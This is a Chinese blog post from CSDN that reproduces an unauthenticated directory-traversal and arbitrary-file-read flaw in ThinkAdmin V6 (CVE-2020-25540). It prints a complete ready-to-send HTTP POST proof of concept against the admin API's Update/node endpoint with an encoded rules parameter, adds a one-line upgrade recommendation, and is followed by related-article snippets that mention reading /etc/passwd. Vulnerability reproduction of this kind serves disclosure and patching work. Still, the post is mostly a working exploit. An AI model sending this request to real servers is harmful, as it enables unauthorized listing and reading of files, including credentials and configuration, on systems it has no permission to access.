ThinkAdminV6 未授权访问and 任意文件查看 漏洞复现

最新推荐文章于 2024-01-23 09:29:52 发布
最新推荐文章于 2024-01-23 09:29:52 发布
阅读量929 收藏
点赞数
分类专栏: 漏洞复现 渗透测试 文章标签: ThinkAdminV6 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Adminxe/article/details/108744912
版权

0x00 简介

ThinkAdmin是基于 ThinkPHP 的微信后台管理平台

0x01 影响版本

ThinkAdminV6

0x02 漏洞复现

POC:

POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

rules=%5B%22.%2F%22%5D

目录遍历注意POST数据包rules参数值需要URL编码

0x03 修复建议

升级版本

转载请注明:Adminxe's Blog » ThinkAdminV6 未授权访问and 任意文件查看 漏洞复现

Adminxe
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ThinkAdmin漏洞(CVE-2020-25540 )复现
锋刃科技的博客
10-18 5177
简介 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统 漏洞概述 ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。 影响版本 ThinkAdmin版本小于 ≤ 2020.08.03.01 环境搭建 使用phpstudy进行安装 设置阿里云 Composer 代理 composer config -g repo.packagist c...
Node.js 中的get/post请求
weixin_45492194的博客
08-05 191
一.在node.js中有两种请求方式即get/post请求 再此简单的介绍这两种请求方式: 1.1.获取get请求 var http = require(‘http’); var url = require(‘url’); var util = require(‘util’); http.createServer(function (req, res) { res.writeHead(200,...
CVE-2020-25540:ThinkAdmin授权列目录/任意文件读取漏洞复现
Jietewang的博客
12-11 2855
1. 简介 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 2. 影响范围 Thinkadmin ≤ 2020.08.03.01 v5(任意文件读取) v6(列目录,任意文件读取) 3. 环境搭建 ThinkAdmin 源码仓库:https://github.com/zoujingli/ThinkAdmin 详细安装过程请查看官方手册,环境搭建过程均来自手...
node.js中的get和post
weixin_44223913的博客
01-02 302
关于node.js中的get和post请求 本人小白一个,此时的感悟,如有正确的地方,望大佬指教 GET请求 var http = require('http') var server = http.createServer() //启用node的url核心模块 var url = require('url') //当客户端发送请求时,获取他的请求地址 server.on('request'...
Node.js中Get和Post请求
qq_39897978的博客
11-11 621
   对于HTTP请求来说,我们通常使用的是Get和Post,除此之外还有put,delete等,而对于get来说,比较lightweight,只是对字符串的传输,它会被添加到URL地址里,属于URL的一部分;而对于Post来说,就显得重了一些,它的数据以包的形式存在,除了可以有文本信息,还可以有二进制文件流信息。 1.GET          --------数据在URL中 使用NodeJ...
基于ThinkPHP6的后台开发框架ThinkAdmin v6.0开源代码
05-17
ThinkAdmin v6基于v1-v5版本的积累,结合ThinkPHP 6.0的思维重新构建,减少大量原非必需的组件,自建存储层、服务层及任务机制,增加了许多友好指令!ThinkAdmin v6经历了数个项目实践与测试,不停调整,目前系统...
轻松还在线H5系统网站源码ThinkAdminV5框架版可封装APP.txt
最新发布
03-13
轻松还在线H5系统网站源码ThinkAdminV5框架版可封装APP
ApiAdmin:基于ThinkPHP V6。*开发的面向API的后台管理系统!
01-28
-笔者站在巨人的顶端上,并非高的表现,反而使自己变得渺小〜只有吸收了巨人的营养,茁壮自己才是真正的高大! 管理员 前置页面 ApiAdmin5.0是一个前后端完全分离的项目,前端采用Vue的构建,如需要可视化配置的请...
Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)复现
weixin_39811856的博客
10-29 841
一、漏洞简介: ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。 二、影响范围: Thinkadmin版本小于 ≤ 2020.08.03.01 三、漏洞复现: 利用POC去打(burp直接放包不能成功回去.
Node.js基础—— GET和POST请求
zwd926的博客
12-25 313
参考来源:https://www.runoob.com/nodejs/node-js-get-post.html 在很多场景中,我们的服务器都需要跟用户的浏览器打交道,如表单提交。 表单提交到服务器一般都使用 GET/POST 请求。 接下来,我们就进行get方式的请求,这个我们不需要过多的讲解,相信大家都会用get,我们直接上代码: 在任意盘里创建一个文件夹,我的是在E盘下: 获取...
ThinkPHP6.0完全开发手册-02051436.pdf
02-14
ThinkPHP6.0完全开发手册-02051436.pdf
node.js中的post和get
做一个有知识的人的博客
11-23 354
GET/POST方式 相同点: 都是HTTP协议的方法 都是传递参数给服务器 不同点: 1.传参的方式不一样 GET放在路径后面?开始,后面键值对   $.get("add.php?key="+value,function(data){}) //127.0.0.1:8000/user?name=张三&age=18&sex=男   使用node.js中express框...
13.node.js的GET和POST请求
越努力越幸运的博客
05-18 288
文章目录node.js的GET和POST请求获取GET请求获取POST请求 node.js的GET和POST请求 在很多场景中,我们的服务器都需要跟用户的浏览器打交道,如表单提交,而表单提交到服务器一般都使用 GET/POST 请求。 获取GET请求 由于GET请求直接被嵌入在路径中,URL是完整的请求路径,包括了?后面的部分,因此我们可以手动解析后面的内容作为GET请求的参数,node.js 中 url 模块中的 parse 函数提供了这个功能。 先编写一个获取GET请求的服务器代码 const http
ThinkAdmin任意文件读取(CVE-2020-25540)
m0_65150886的博客
01-23 474
ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。该漏洞主要是因为api中存在危险函数,且作任何限制。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的文件。1.访问http://ip:port,出现如下页面,开始实验。获取/etc/passwd的base64编码。2.构造payload。4.base64解码。
ThinkAdminV6 CVE-2020-25540 目录遍历文件读取漏洞
3hex的博客
11-23 4638
POC:https://github.com/Schira4396/CVE-2020-25540/blob/main/poc.pyhttps://github.com/Schira4396/CVE-2020-25540/blob/main/poc.py 影响版本: ThinkAdmin版本 ≤ 2020.08.03.01 漏洞详解: https://github.com/zoujingli/ThinkAdmin/issues/244https://github.com/zoujingli/Think
thinkadmin V6 Experiences
FengQingYunLing的专栏
05-03 471
全文搜索以下代码:<input class="layui-input validate-error" required="" pattern="^\S{4,}$" vali-name="登录账号" name="username" autofocus="" autocomplete="off" placeholder="登录账号">,去除 【pattern="^\S{4,}$"】正则项即可。2、单个时间属性使用:data-date-input,开始结束时间属性使用:data-date-range。
ThinkAdmin列目录/任意文件读取(CVE-2020-25540 )漏洞复现及环境搭建
yzl_007的博客
08-03 2333
ThinkAdmin列目录/任意文件读取(CVE-2020-25540 )漏洞复现 漏洞介绍 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 影响范围 Thinkadmin ≤ 2020.08.03.01 v5(任意文件读取) v6(列目录,任意文件读取) ThinkAdmin6环境搭建 这里我使用的是kali linux靶机来搭建环境 1、安装php环境 查看版本发现没有,按照要求
thinkadmin
weixin_41647577的博客
10-30 2039
https://gitee.com/bullet/thinkadmin   https://gitee.com/zoujingli/Think.Admin (最新版)
Think.PHP框架漏洞复现
m0_71300782的博客
09-13 851
2.服务器启动先cd到thinkphp文件夹下面的5-rce里面,然后docker-compose up -d 安装环境3.进入浏览器ip地址加8080看见。
ThinkPHP框架漏洞总结
weixin_42345596的博客
08-25 3764
Thinkphp简介 ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ThinkPHP可以支持windows/U

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值